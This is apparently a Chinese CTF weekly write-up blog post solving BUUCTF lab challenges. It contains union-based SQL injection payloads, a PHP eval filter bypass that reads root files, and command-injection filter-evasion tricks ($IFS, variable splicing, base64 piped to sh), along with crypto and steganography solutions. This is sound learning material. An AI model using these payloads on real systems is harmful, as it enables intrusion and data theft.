每周刷题(四)

最新推荐文章于 2022-07-02 15:12:31 发布
最新推荐文章于 2022-07-02 15:12:31 发布
阅读量426 收藏 1
点赞数 3
分类专栏: 刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45869039/article/details/108996546
版权

目录

0×00 web1 [极客大挑战 2019]LoveSQL

又是一道注入题。

在这里插入图片描述
我竟然使用万能密码登录成功了。

在这里插入图片描述
给了一串字符但是不知道是啥用。

但换个思维来说,这可能是可回显注入。

payload:http://e1455b99-b85f-4948-8f64-0865420f5f19.node3.buuoj.cn/check.php?username=1'&password=1

用这个来判断闭合符号

在这里插入图片描述
闭合符号为'

而且报错信息是显示在了password那里。

payload?username=1&password=123 ' order by 4 %23

判断列数
在这里插入图片描述

4不行,3可以。判断出有3列

构造payload:?username=1&password=123 ' union select 1,2,3 %23

在这里插入图片描述
emmm

按照联合查询注入一步一步来吧。

判断数据库

payload:?username=1&password=123 ' union select 1,2,database() %23

在这里插入图片描述
数据库geek

爆出表
payload:?username=1&password=123 ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' %23

在这里插入图片描述
从l0veysq1表判断列名

payload:?username=1&password=123 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' %23

在这里插入图片描述
查看账号密码

payload:?username=1&password=123 ' union select 1,2,group_concat(username,0x3a,password) from l0ve1ysq1 %23

在这里插入图片描述
找到flag

0×01 web2 [RoarCTF 2019]Easy Calc

简单的计算器

在这里插入图片描述
查看源码的我,也很懵

$('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })

calc.php?num="+encodeURIComponent($("#content").val()

给了点思路。

访问calc.php得到了过滤规则。

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }       匹配到黑名单里的字符同时输出die的内容
        }
        eval('echo '.$str.';');
}
?>

对我们传入的num参数,进行了黑名单过滤,遍历啊,正则匹配啊,一顿操作。

①利用waf与php解析的差异

waf里num就是num, num≠ num≠+num,也就是如果waf过滤了前者,那么后两者就不会被过滤;但是php解析就不一样了,解析前php会删除空白字符串并且将一些特殊字符(空格也是)转换为下划线_,这也就说num= num=+num,这就是解析的差异

那麽我们可以构造payload? num=phpinfo()
不止空格,+,-等等也行

在php版本信息里看到了禁止的函数

在这里插入图片描述
system函数被禁止了。

我们可以使用var_dump函数将内容打印出来,但是scandir("")访问根目录的文件,但是""和\都被过滤了,所以我们需要使用chr()函数从指定的 ASCII 值返回字符。47的ASCII为\,并且47是整型不需要加双引号。

payload:? num=var_dump(scandir(chr(47)))

在这里插入图片描述
看到了f1agg数组。(是1不是l)

接下来利用file()函数或者file_get_contents()函数(如果system不被禁止和他们的用法一样)

payload:?+num=var_dump(file((chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

或者
payload:?+num=var_dump(file_get_contents((chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

必须要加chr(47),即\,因为要访问根文件。
“点号”是一个字符串连接符,即并置运算符,用来拼接字符串。
“逗号”才是分隔符

看到大佬说这里的chr(47)也可以换为hex2bin(dechex(47))
dechex()函数把十进制数转换为十六进制数。hex2bin()函数把十六进制值的字符串转换为 ASCII字符。(有点更麻烦了,但也是一种绕过方法,学习了)

至于http走私的解题方法以后会补充上的。

0×02 web 3 [GXYCTF2019]Ping Ping Ping

在这里插入图片描述
一道ping命令题

DVWA里有类似题

构造payload:?ip=127.0.0.1&ls或者?ip=127.0.0.1|ls

在这里插入图片描述
然后payload:?ip=127.0.0.1&cat flag.php

在这里插入图片描述
有空格,需要用$IFS$1替代

常用的代替空格的

$IFS

${IFS}

$IFS$1 //$1改成$加其他数字都可以

<

<>

{cat,flag.php}  //用逗号实现了空格功能

%20

%09

在这里插入图片描述
flag这个词也被过滤了。

(ˉ▽ˉ;)…

大师傅说可以用index.php查看waf(我竟然没想起来)

/?ip=
|’|"|\|(|)|[|]|{|}/", $ip, $match)){
echo preg_match("/&|/|?|*|<|[\x{00}-\x{20}]|>|’|"|\|(|)|[|]|{|}/", $ip, $match);
die(“fxck your symbol!”);
} else if(preg_match("/ /", $ip)){
die(“fxck your space!”);
} else if(preg_match("/bash/", $ip)){
die(“fxck your bash!”);
} else if(preg_match("/.*f.*l.*a.g./", $ip)){
die(“fxck your flag!”);
}
$a = shell_exec("ping -c 4 ". $ ip);
echo "
";
print_r($ a);
}
?>

过滤了很多的字符。

考虑用拼接payload:?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

看了半年也没有发现flag,最后发现藏在了源代码里
在这里插入图片描述

原谅我的无知。

另一种方法:内联执行(我感觉还是拼接)

payload:?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php

将flag拆开覆盖不同的变量,在拼接一起。

查看源码就可以获取flag。

还有几种方法我也是第一次见(做题太少了)

①因为过滤了bash,但可以使用sh,需要对flag.php进行base64加密。(编码绕过)
payload:echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

其中Y2F0IGZsYWcucGhw是cat flag.php的base64加密出的。

|sh的意思是执行前面的echo语句。

对于几种绕过关键字过滤的方式

可以绕过cat这一整体,对于单个的的就不行了。

$*
$@
$x    (x 代表 1-9)
${x}   (x>=10)
在没有传参的情况下,上面的特殊变量都是为空的 ca${21}t a.txt
ca\t a.txt            //反斜杠绕过
a=ca;b=t;c=a.txt;aaab $c         //变量替换
c'a't flag.php           //引号

echo 'cat a.txt' | xxd -p 63617420612e7478740a
echo '0x63617420612e7478740a'| xxd -r -p Abc     //十六进制编码绕过

最后一种:通配符

? 
*
[…]:匹配范围中任何一个字符 cat fl[abc]g.php
[a-z]:匹配 a-z 范围中任何一个字符 cat fl[a-z]g.php
{a,b}:对以逗号分割的文件列表进行拓展 cat fl{b,c}g.php

呜哈哈哈哈哈

0×03 cypto1 RSA3

给的信息

c1=22322035275663237041646893770451933509324701913484303338076210603542612758956262869640822486470121149424485571361007421293675516338822195280313794991136048140918842471219840263536338886250492682739436410013436651161720725855484866690084788721349555662019879081501113222996123305533009325964377798892703161521852805956811219563883312896330156298621674684353919547558127920925706842808914762199011054955816534977675267395009575347820387073483928425066536361482774892370969520740304287456555508933372782327506569010772537497541764311429052216291198932092617792645253901478910801592878203564861118912045464959832566051361
n=22708078815885011462462049064339185898712439277226831073457888403129378547350292420267016551819052430779004755846649044001024141485283286483130702616057274698473611149508798869706347501931583117632710700787228016480127677393649929530416598686027354216422565934459015161927613607902831542857977859612596282353679327773303727004407262197231586324599181983572622404590354084541788062262164510140605868122410388090174420147752408554129789760902300898046273909007852818474030770699647647363015102118956737673941354217692696044969695308506436573142565573487583507037356944848039864382339216266670673567488871508925311154801
e1=11187289
c2=18702010045187015556548691642394982835669262147230212731309938675226458555210425972429418449273410535387985931036711854265623905066805665751803269106880746769003478900791099590239513925449748814075904017471585572848473556490565450062664706449128415834787961947266259789785962922238701134079720414228414066193071495304612341052987455615930023536823801499269773357186087452747500840640419365011554421183037505653461286732740983702740822671148045619497667184586123657285604061875653909567822328914065337797733444640351518775487649819978262363617265797982843179630888729407238496650987720428708217115257989007867331698397
e2=9647291

看了很多大师傅对于共模攻击的介绍的文章,我有感觉对我能行了。

其实共模攻击很好理解,就是一条相同的消息,同时经过所有公钥加密就造成了共模攻击。
共模攻击利用的大前提就是,RSA体系在生成密钥的过程中使用了相同的模数n。

就以上面的题来说,两个加密都是用了共同的n。

我将明文M加密并发给A和B两个朋友。

密文1=M ^ e1 mod n
密文2 = M^ e2 mod n

他们利用自己持有的私钥,得到信息M。

但是当另一个人监听了A和B接收到的密文密文1,密文2,因为模数不变,以及所有公钥都是公开的,那么利用同模攻击,他就可以在不知道d1,d2的情况下解密得到消息m,这就利用共模攻击造成了信息泄露。

大佬对共模攻击的详解点这

上代码

from gmpy2 import *
import libnum

n=22708078815885011462462049064339185898712439277226831073457888403129378547350292420267016551819052430779004755846649044001024141485283286483130702616057274698473611149508798869706347501931583117632710700787228016480127677393649929530416598686027354216422565934459015161927613607902831542857977859612596282353679327773303727004407262197231586324599181983572622404590354084541788062262164510140605868122410388090174420147752408554129789760902300898046273909007852818474030770699647647363015102118956737673941354217692696044969695308506436573142565573487583507037356944848039864382339216266670673567488871508925311154801
e1=11187289
e2=9647291
s = gcdext(e1, e2)
s1 = s[1]
s2 = -s[2]

c1=22322035275663237041646893770451933509324701913484303338076210603542612758956262869640822486470121149424485571361007421293675516338822195280313794991136048140918842471219840263536338886250492682739436410013436651161720725855484866690084788721349555662019879081501113222996123305533009325964377798892703161521852805956811219563883312896330156298621674684353919547558127920925706842808914762199011054955816534977675267395009575347820387073483928425066536361482774892370969520740304287456555508933372782327506569010772537497541764311429052216291198932092617792645253901478910801592878203564861118912045464959832566051361
c2=18702010045187015556548691642394982835669262147230212731309938675226458555210425972429418449273410535387985931036711854265623905066805665751803269106880746769003478900791099590239513925449748814075904017471585572848473556490565450062664706449128415834787961947266259789785962922238701134079720414228414066193071495304612341052987455615930023536823801499269773357186087452747500840640419365011554421183037505653461286732740983702740822671148045619497667184586123657285604061875653909567822328914065337797733444640351518775487649819978262363617265797982843179630888729407238496650987720428708217115257989007867331698397
e2=9647291
c2 = invert(c2, n)
m = (pow(c1,s1,n) * pow(c2 , s2 , n)) % n
print (m)
print (libnum.n2s(m))

直接得到flag。

0×04 cypto2 世上无难事

VIZZB IFIUOJBWO NVXAP OBC XZZ UKHVN IFIUOJBWO HB XVIXW XAW VXFI X QIXN VBD KQ IFIUOJBWO WBKAH NBWXO VBD XJBCN NKG QLKEIU DI XUI VIUI DKNV QNCWIANQ XN DXPIMKIZW VKHV QEVBBZ KA XUZKAHNBA FKUHKAKX XAW DI VXFI HBN QNCWIANQ NCAKAH KA MUBG XZZ XEUBQQ XGIUKEX MUBG PKAWIUHXUNIA NVUBCHV 12NV HUXWI XAW DI XUI SCQN QB HZXW NVXN XZZ EBCZW SBKA CQ NBWXO XAW DI DXAN NB NVXAP DXPIMKIZW MBU JIKAH QCEV XA BCNQNXAWKAH VBQN HKFI OBCUQIZFIQ X JKH UBCAW BM XLLZXCQI XAW NVI PIO KQ 640I11012805M211J0XJ24MM02X1IW09

以为是十六进制,试了n次无果。

题目给了三个限制
①key作为答案提交
②答案是32位
③包含小写字母

没想到又是替换密码PIO=key

在这里插入图片描述
flagggggg(改为小写)

0×05 cypto3 异性相吸

给了两个文件,key.txt和密文.txt

key.txt

asadsasdasdasdasdasdasdasdasdasdqwesqf

密文.txt

ἇ̀Ј唒ဃ塔屋䩘卖剄䐃堂ن䝔嘅均ቄ䩝ᬔ

在这里插入图片描述
忍不住看了大师傅博客,是抑或

#-*-coding:utf-8 -*-
with open('密文.txt'.decode('utf-8'),'rb') as a:
    a=a.read()
with open('key.txt','rb') as b:
    b=b.read()
d=''
print len(b)
print len(a)
for i in range(0,len(b)):
    c=chr(ord(a[i])^ord(b[i]))
    d+=c
print(d)

得到了flag。

0×06 MIsc1 FLAG

在这里插入图片描述
拉进weihex里也没有线索。

stegsolve里看了下也没什么,被提示到是最低位隐写。

在这里插入图片描述
save bin保存为zip文件。

Windows下无法打开,那就使用kail。

使用file 1查看文件,使用strings查看文件的字符串,得到flag。
在这里插入图片描述

0×07 Misc2 另外一个世界

在这里插入图片描述
图片的名字monster(怪物),看了图片属性也没给什么信息。

直接拉进winhex里。
在末尾发现了一串二进制数字。

在这里插入图片描述

找个网站,二进制转换为各种进制和字符串。

在这里插入图片描述
好家伙,直接得到flag。

0×08 Misc3 假如给我三天光明

得到一个压缩包(加密的)和一张图片。
在这里插入图片描述
赶紧找点盲文对照表,总感觉下面的点点不对劲
在这里插入图片描述
转换一下图片下的字符是:kmdonowg

那就应该是压缩包的密码了

听了音频文件,那嘀嘀嘀的声音,盲猜摩斯密码(突然想起了亮剑)

拿出我百年前的神器Audacity,就慢慢听吧

脑子充满了滴答滴答滴答滴答
最后得到-.-. - ..-. .-- .--. . .. ----- ---.. --... ...-- ..--- ..--.. ..--- ...-- -.. --..
解密得到:CTFWPEI08732?23DZ提交的时候转换为小写。

这周就结束了,明天又是元气满满的一天!!!

小小奇点呀!
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF CRYPTO
C__pigeon的博客
07-13 865
萌萌哒的八戒 题目: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7XNhHJYH-1626162634860)(C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20210711172929582.png)] 解答:猪圈密码[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sBbbSLFt-1626162634864)(C:\Users\Lenovo\AppData\
BUUCTF 打卡3
qq_52193383的博客
08-22 308
之前一直觉得没有学,所以碰到不会的大概率都会划走。但想想,总该要面对的。 不知道并不可怕,不知道还不去学才可怕。 1. 丢失的MD5 可以看出这段代码是在py2中运行的。 解出来的就是flag。 2.Alice与Bob???? 根据题目要求,将素数98554799767分解为101999和966233,并组成新的数101999966233,然后进行md5的32位小写哈希。 (为什么用py2的md5库运行不是正确答案???) 3.Windows系统密码 windows下密码的格式: Windows系统下的
[RoarCTF 2019]Easy Calc 1
qq_43618536的博客
07-02 339
BUUCTF的[RoarCTF 2019]Easy Calc 1
BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping
qq_45616570的博客
03-10 211
BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping 不定时更新 题目 考点 命令执行和过滤 解题思路 从题目可以看出需要执行?ip= 解题过程 构造payload http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1 查看文件目录 http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=12
leetcode:算法刷题
05-23
《LeetCode:JavaScript算法刷题指南》 在编程领域,LeetCode是一个广为人知的在线平台,它提供了大量的编程挑战,旨在帮助开发者提升算法技能、解决问题的能力以及对数据结构和算法的理解。对于想要深入学习...
LeetCode:leetcode刷题记录
03-27
在这个“LeetCode刷题记录”中,我们可以看到两个具体的题目,即“84.柱状图中最大矩形”和“重新排列后的最大子矩阵(第224周每周竞赛T3)”。这两个题目涉及到的数据结构和算法知识是十分重要的,下面将分别对它们...
程序员考试刷题-SESE:自己
07-07
程序员考试刷题软件工程专业英语(SESE) 北京交通大学软件学院学生课程。 课程结构 课程分为8个单元,对应8天的课程。 对于每个单元,有 4 个部分: 阅读理解 提前提供了软件领域的文章。 在课上,讲师会讲解文章...
如何正确刷题?.doc
12-13
这意味着要控制每天和每周的做题数量,避免陷入题海战术。在开始做题前,应该对题目进行筛选,挑出那些你已经熟悉或者多次遇到的普通题目,重点放在不熟练或陌生的题目上。这样做可以确保你的精力集中在需要提升的...
leetcode下载-leetcode:刷题
06-29
每周一题/每周看一篇英文 22周 2020/05/26 两数之和: 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。 你可以假设每种输入只会对应一个答案。...
RSA密码的原理及做题总结
qq_45927819的博客
09-23 3460
RSA算法:是应用最广泛的公钥密码算法 RSA算法步骤: 1.随计选择两个不相等的质数p,q 2.计算它们的乘积N=p*q 3.计算欧拉函数φ(N)=(p-1)(q-1),N的二进制长度作为密钥的长度, 4.随机选择一个加密密钥e,这里1<e<φ(N), gcd(e,φ(N))=1,即e与φ(N)互质。 5.根据以下公式求解得到解密密钥d ed=1 mod φ(N),0≤d≤N 6.发布加密密钥:(e,N) 7.保密解密密钥:(d,N) 这里的n就是N!!!! 这张图是我偷别人的哈哈哈哈
php if(!isset($page),有没有办法在isset($ _ POST [])条件中访问isset($ _ GET [])条件中创建的变量?...
weixin_39775976的博客
03-11 220
好的,所以只是澄清那些发现我的问题不清楚的人 . 我试图对我的脚本进行两次不同的调用 .第一个是GET请求 .第二个是POST请求 .我正在尝试执行上述操作,同时保留在POST请求中使用它时位于GET请求中的$ post_id的值 .正如 dan08 & Crayon Violent 所建议的那样,当尝试将变量的值从一个HTTP请求方法传递给另一个时,无法保留变量的值 . 正如 Crayon Vi...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6305
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
[RoarCTF 2019]Easy Calc
qi_SJQ_的博客
02-08 370
1.这题看前端js代码可以发现: $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#result").html(`<div class="alert
2020-09-03签到赛
Kihyun_的博客
09-03 265
super_easy_web1P1P依旧开心哈哈哈Very_Ez_Unserialize super_easy_web <?php highlight_file('index.php'); include('flag.php'); //try to reach the flag in variable if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'].
第二十天 CTF初识
weixin_46653764的博客
06-26 728
一、记下一些不知道的小知识 (1)常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history 而 php的备份有两种:****.php~和.php.bak (2)去了解php的弱类型 (3)
【BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 2012
【BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
js 的encodeURIComponent() 处理ajax请求url中的 “+ ? ; = @ $ #”等等特殊字符
老田的专栏
05-27 1945
js中的encodeURI()处理不了 “+ : ? ; = @ , $  #”,这些特殊字符不被转换,要用encodeURIComponent()处理才行, 比如:         “+” 转换后就是“%2B”   然后在php页面用urldecode()解码就行了. 例如:js 的ajax   url中含有“+ ;: , #”: url :encodeURI(
CTF密码学--新手题--Normal_RSA--解题过程及总结
hippotomons的博客
10-21 8065
Normal_RSA 难度系数: ☆ 题目来源: PCTF 题目描述: 你和小鱼走啊走走啊走,走到下一个题目一看你又一愣,怎么还是一个数学题啊 小鱼又一笑,hhhh数学在密码学里面很重要的!现在知道吃亏了吧!你哼一声不服气,我知道数学 很重要了!但是工具也很重要的,你看我拿工具把他解出来!你打开电脑折腾了一会还真的把答案 做了出来,小鱼有些吃惊,向你投过来一个赞叹的目光 附件下载下来又是一阵懵逼...
leecode刷题手册
最新发布
07-15
9. 刷题计划:可以制定一个刷题计划,每天或每周刷一定数量的题目,并坚持下去。 10. 总结和复习:在刷题过程中,及时总结自己的思考和解题过程,对于一些常见的算法和技巧进行复习和加深理解。 希望以上的建议对...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值